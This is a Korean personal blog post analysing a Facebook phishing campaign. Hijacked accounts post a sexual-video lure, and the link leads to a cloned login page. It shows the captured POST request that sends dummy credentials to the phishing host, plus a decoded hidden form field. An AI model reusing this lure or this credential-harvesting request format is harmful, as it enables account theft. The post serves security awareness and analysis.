최근 페이스북에서 계정을 탈취 당한 사용자의 아이디를 이용하여 "야한 동영상(야동 또는 성정적인 동영상)" 사진을

업로드 하고, 해당 피드에 친구리스트를 모두 초대하여 추가적인 로그인 습득을 하기 위한 공격이 유행하고 있다.


이스트소프트의 알약 블로그에 해당 내용이 더 자세하게 나와있으니 참고~!!


알약 블로그 이외에도 Ec0nomist's Lab, viruslab 블로그에 가면 실제로는 더 많은 사례들을 볼 수 있다.


이 방식이 새로운 방식은 아니지만 최근에는 국내 사용자를 타겟으로 빈번하게 발생하고 있는 듯 하다.

(국내 사용자를 타겟으로 한다고 이야기하는 건 개인적으로 국내 동영상을 많이 사용하고 있기 때문이지, 공식적인 내용은 아니다)


이전에는 나한테 직접 오는 경우가 없어서 포스팅을 못하고 있었는데, 운좋게 어제 나에게도 행운이 찾아왔다!!


그럼 어떤식으로 이번 피싱사이트로 유도를 하는지 알아보자.


최초 유포는 위에서 말했듯이 계정을 탈취 당한 사용자가 "야한 동영상(야동 또는 성정적인 동영상)"을 업로드하고,

자신의 친구를 모두 초대시킨다.


이때 초대 된 사용자가 클릭하여 동영상을 볼 수 있게 링크를 걸어둔다.

(나도 초대가 되어 해당 피드를 확인 할 수 있었다 ㅋㅋㅋ)


※ 정말 아쉽게도 최초 유포 사진을 찍지 못함;;;

스크린샷을 찍기 위해 남겨두었었는데 실수로 F5를 누르는 바람에 ㅡ.ㅡ;;;;;;;


암튼, 내가 확인 한 피싱 피드는 아래와 같이 작성되어 있었다.




사진 상단의 문구인 ">.< OMG ... SEXY GIRL KOREA !  Application Video" 에서 Application Video 를 클릭하면 

Facebook 로그인 피싱 사이트로 이동된다.



아래는 정상적인 페이스북 로그인 사이트이다.

전혀 다른게 없다;;



Facebook 로그인 피싱 사이트의 로그인 창에 이메일(전화번호)과 암호를 입력하면 특정 서버에 전송이 되고, 

습득한 계정에 로그인해서 가입되어 있던 그룹에 추가적인 전파를 시도 할 것으로 보인다.


User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip, deflate

Host: malai-appsnew.com

Content-Length: 243

Connection: Keep-Alive

Cache-Control: no-cache


lsd=AVpTtEad&display=&enable_profile_selector=&legacy_return=1&profile_selector_ids=&trynum=1&timezone=&lgndim=&lgnrnd=022441_u34E&lgnjs=n&email=guest@guest.com&pass=123456789&persistent=1&default_persistent=1&login=%EB%A1%9C%EA%B7%B8%EC%9D%B8



실제로 로그인창에 모든 내용을 기록하면 유투브(YouTube)의 영상페이지로 이동 된다.

(영상은 윙크티비 BJ 비비앙님 ㄷㄷㄷㄷ)



이 과정에서 로그인 클릭 시 유투브 사이트로 이동하는 방식을 좀 알아보려고 했다.


해당 사이트를 분석하다 보니 login.php 내부 로그인폼에 hidden 타입의 input 태그가 입력되어 있었다.


<input type="hidden" name="qsstamp" value="W1tbMjMsMzIsNDksOTAsOTMsOTYsMTA3LDExMiwxMjIsMTM1LDIwNCwyNDEsMjQzLDI0OCwyNjgsMjk0LDMxMiwzMTgsMzIyLDM0MiwzNTQsMzU5LDM2NiwzNzAsMzc5LDM4NywzOTYsNDA4LDQxMSw0MTIsNDE5LDQyNiw0MzMsNTA2LDUyMCw1MjIsNTQxLDU2Miw1NzMsNjAzLDY1OCw2ODNdXSwiQVprQ3FLeUhQenowWEdsQTJTblp1ZFZEV1lOREwxSmFDU1lUa05fZXJYSTYtWGdaZ05SZHBmREdZQlllLWZBdjhyTTMtR1dhbEJnZkRnS2VVaG1MblRpbjlGeW9uWmxibXcyd2hqNFNxNFp3b01qM0VNUnA2ak9ZbndVNDN5LWNrOHNCd29zRUltUW0yR093WFAzUGpnMkJjN3p1Vm5qZV8zaWtqYWU5YzFQZHUzay1uMHQwSWF4ZFhjZTM4bV9ZUEZuWVo1UkU4bHdORXBLUUdBNHdvcEc5Il0=">


value 값에는 Base64로 보이는 데이터가 있어서 디코딩 해봤더니 아래와 같이 복호화가 되었다.

[[[23,32,49,90,93,96,107,112,122,135,204,241,243,248,268,294,312,318,322,342,354,359,366,370,379,387,396,408,411,412,419,426,433,506,520,522,541,562,573,603,658,683]],"AZkCqKyHPzz0XGlA2SnZudVDWYNDL1JaCSYTkN_erXI6-XgZgNRdpfDGYBYe-fAv8rM3-GWalBgfDgKeUhmLnTin9FyonZlbmw2whj4Sq4ZwoMj3EMRp6jOYnwU43y-ck8sBwosEImQm2GOwXP3Pjg2Bc7zuVnje_3ikjae9c1Pdu3k-n0t0IaxdXce38m_YPFnYZ5RE8lwNEpKQGA4wopG9"]


근데....아무리 봐도 이게 어떻게 hxxps://www.youtube.com/watch?v=Q9cVmRrdKAI 이 사이트로 이동을 하는건지

도통 모르겠다;;


포스팅을 보시는 분들 중에서 혹시 아시는분은 댓글로 설명 좀^^

(php 서버라서 내부에서 뭔 짓을 하는지 모르겠음 ㅠㅠ)


계속 이어서....

사용자가 클릭하여 이동 한 Facebook 로그인 피싱 사이트는 실제 미국 쪽에 위치 하는 것을 알 수 있다.



※ 추가 내용

다른 내용이 있는지 구글링 중 다른 이미지도 있어서 그냥 추가해 본다 ㅎㅎㅎ


블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.